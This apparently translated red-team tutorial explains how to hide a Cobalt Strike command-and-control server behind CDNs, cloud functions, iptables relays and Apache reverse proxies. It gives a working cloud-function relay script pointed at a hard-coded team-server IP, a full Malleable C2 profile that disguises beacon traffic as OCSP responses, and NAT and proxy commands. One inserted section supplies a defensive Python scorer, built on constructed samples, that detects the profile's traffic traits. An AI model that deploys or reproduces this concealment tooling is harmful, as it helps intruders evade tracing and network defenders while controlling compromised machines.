Red Team APT - Traffic Concealment: C2 tools, anti-traceback, hiding the source IP, cloud functions, CDN nodes, data relay, reverse proxy
➢ Red Team APT - Traffic Concealment - C2 certificates & signature analysis
➢ Red Team APT - Hiding from Traceback - C2 communication & relay nodes
#CDN
Why use it:
1. Hides the IP of the server that beacons call back to
2. The node IPs all belong to the CDN vendor
How to use it:
1. With a domestic (China) vendor and an ICP-filed domain
See the bundled documentation for the steps
2. With a Cloudflare domain (international)
Reference: https://mp.weixin.qq.com/s/EtO2kvt80dd7U_zHR4ZoYQ
#Cloud functions:
A serverless execution environment that providers offer to enterprises and developers,
letting you run code without buying or managing servers.
Alibaba Cloud: https://www.aliyun.com/product/fc
Tencent Cloud: https://console.cloud.tencent.com/scf/
Huawei Cloud: https://developer.huawei.com/consumer/cn/agconnect/cloud-function/
Baidu Cloud: https://cloud.baidu.com/product/cfc.html
China Mobile Cloud: https://ecloud.10086.cn/home/product-introduction/sfc
China Telecom Cloud (Tianyi Cloud): https://www.ctyun.cn/products/hsjs
ByteDance Light Service (Qingfuwu): https://qingfuwu.cn/
AWS Lambda: https://aws.amazon.com/lambda/
Google Firebase: https://firebase.google.com/
Azure Functions: https://azure.microsoft.com/en-us/services/functions/
Why use it:
1. Hides the IP of the server that beacons call back to
2. Check-in traffic egresses to a provider domain that is typically on allowlists
How to use it:
1. Create a cloud function
2. Create the function service
Choose Python 3.6 as the runtime,
then paste the following code and replace the IP with that of the CS server
# -*- coding: utf-8 -*-
import base64
import requests

def handler(event, context):
    # Relay the request received from the API gateway to the team server
    C2 = 'https://146.56.204.52:443'  # https
    # C2 = 'https://146.56.204.52:80'  # http
    path = event['path']
    headers = event['headers']
    print(event)
    if event['httpMethod'] == 'GET':
        resp = requests.get(C2 + path, headers=headers, verify=False)
    else:
        resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
    print(resp.headers)
    print(resp.content)
    # Hand the team server's reply back through the gateway, body base64-encoded
    response = {
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": base64.b64encode(resp.content).decode('ascii')
    }
    # return event
    return response
3. Create a trigger
Choose API Gateway (HTTP/S) as the trigger type, tick "Enable integrated response", and click Submit
4. Configure the trigger
Click the API service name to configure the trigger
Change the path to /{path+}, then click Complete
5. Modify the URLs in the profile to match
set sample_name "t";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/api/x";
    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}
6. Start CS and load the profile
./teamserver <IP> <password> xxx.profile
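Detection view, as an added example that is not part of the original deck: the profile above leaves fixed traits in every HTTP transaction (base64 text served as application/ocsp-response, a MIME-only content-transfer-encoding header, Server: Nodejs, and a base64 blob after SESSIONID=/JSESSION= on a two-character /api/ URI). The scorer below checks proxy or IDS transaction records for those traits; the record layout and the sample records are constructed for this example and are not captured traffic.

```python
import base64
import re

# Traits taken from the profile above: base64 text served as an OCSP response, a
# MIME-only header in HTTP, a bogus Server value, and a base64 blob carried in a
# SESSIONID/JSESSION cookie on a short /api/<x> URI.
COOKIE_RE = re.compile(r"\b(SESSIONID|JSESSION)=[A-Za-z0-9+/=]{16,}")
URI_RE = re.compile(r"^/api/[A-Za-z0-9]{1,2}$")

def is_base64_text(body):
    """Printable, strictly decodable base64 (what the profile's 'base64; print;' emits)."""
    try:
        text = body.strip().decode("ascii")
        base64.b64decode(text, validate=True)
        return len(text) >= 8
    except ValueError:  # covers UnicodeDecodeError and binascii.Error
        return False

def score_transaction(tx):
    """Return the profile traits one HTTP transaction matches (empty list = clean)."""
    resp = {k.lower(): v for k, v in tx["resp_headers"].items()}
    hits = []
    # Genuine OCSP responses are DER, so the body starts with the SEQUENCE tag 0x30.
    if (resp.get("content-type") == "application/ocsp-response"
            and tx["body"][:1] != b"\x30" and is_base64_text(tx["body"])):
        hits.append("ocsp-content-type-with-base64-body")
    if "content-transfer-encoding" in resp:  # a MIME header, not defined for HTTP
        hits.append("mime-only-header-in-http-response")
    if resp.get("server", "").lower() == "nodejs":
        hits.append("server-header-nodejs")
    if COOKIE_RE.search(tx["req_headers"].get("Cookie", "")) and URI_RE.match(tx["uri"]):
        hits.append("base64-blob-in-session-cookie")
    return hits

# Constructed sample records, not captured traffic; the dict layout is this example's own.
SAMPLES = {
    "beacon_like": {"uri": "/api/x",
        "req_headers": {"Cookie": "SESSIONID=" + base64.b64encode(b"fake metadata blob 1").decode()},
        "resp_headers": {"Content-Type": "application/ocsp-response",
                         "content-transfer-encoding": "binary", "Server": "Nodejs"},
        "body": base64.b64encode(b"fake tasking bytes")},
    "real_ocsp": {"uri": "/", "req_headers": {"Content-Type": "application/ocsp-request"},
        "resp_headers": {"Content-Type": "application/ocsp-response", "Server": "nginx"},
        "body": bytes.fromhex("30030a0101")},  # DER OCSPResponse with status malformedRequest
    "plain_api": {"uri": "/api/v2/users",
        "req_headers": {"Cookie": "JSESSIONID=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D"},
        "resp_headers": {"Content-Type": "application/json", "Server": "nginx"},
        "body": b'{"users": []}'},
}
```

Run `score_transaction` over each record in SAMPLES: the profile-shaped one returns all four traits, while the genuine DER OCSP reply and the ordinary JSESSIONID-backed API call return nothing.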
#Data relay
1. Set up forwarding on the relay host (change 80 to 443 for HTTPS):
iptables -I INPUT -p tcp -m tcp --dport 1234 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 1234 -j DNAT --to-destination 146.56.204.52:2345
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
2. Point the CS listener at the relay host's IP, port 1234
#Reverse proxy
1. Install Apache on the proxy host:
apt-get install apache2
a2enmod proxy proxy_ajp proxy_balancer proxy_connect proxy_http
systemctl restart apache2
2. Configure forwarding in the web server:
vim /etc/apache2/sites-enabled/000-default.conf
HTTP:
ProxyPass "/" "http://<CS IP>/"
ProxyPassReverse "/" "http://<CS IP>/"
HTTPS:
ProxyPass "/" "https://<CS IP>/"
ProxyPassReverse "/" "https://<CS IP>/"
3. Restart the Apache service
service apache2 restart
4. Point the CS listener at the proxy host's IP